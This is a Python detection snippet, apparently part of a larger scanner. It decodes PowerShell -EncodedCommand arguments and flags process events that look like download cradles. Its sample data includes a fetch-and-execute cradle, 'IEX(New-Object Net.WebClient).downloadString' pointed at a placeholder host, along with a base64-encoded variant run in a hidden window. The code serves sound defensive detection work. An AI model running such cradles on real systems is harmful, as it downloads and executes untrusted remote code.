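# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -en, -enc, ...)
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or "" if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def is_download_cradle(cmdline: str) -> bool:
    """True when the visible or decoded script both evaluates code and fetches it remotely."""
    text = cmdline + "\n" + decode_encoded_command(cmdline)
    return all(p.search(text) for p in CRADLE_PATTERNS)

def scan_process_events(events) -> list:
    """events: iterable of (host, user, cmdline); returns the ones that look like cradles."""
    return [(h, u, c) for h, u, c in events if is_download_cradle(c)]

def encode_command(script: str) -> str:
    """Build what -EncodedCommand expects; used here only to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

CRADLE = "IEX(New-Object Net.WebClient).downloadString('http://192.0.2.5:8000/exploit.html')"
SAMPLE_EVENTS = [                         # constructed (host, user, command line) triples
    ("WS01", "alice", 'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"'),
    ("WS02", "bob",   f'powershell "{CRADLE}"'),
    ("WS03", "carol", f"powershell.exe -w hidden -enc {encode_command(CRADLE)}"),
]
```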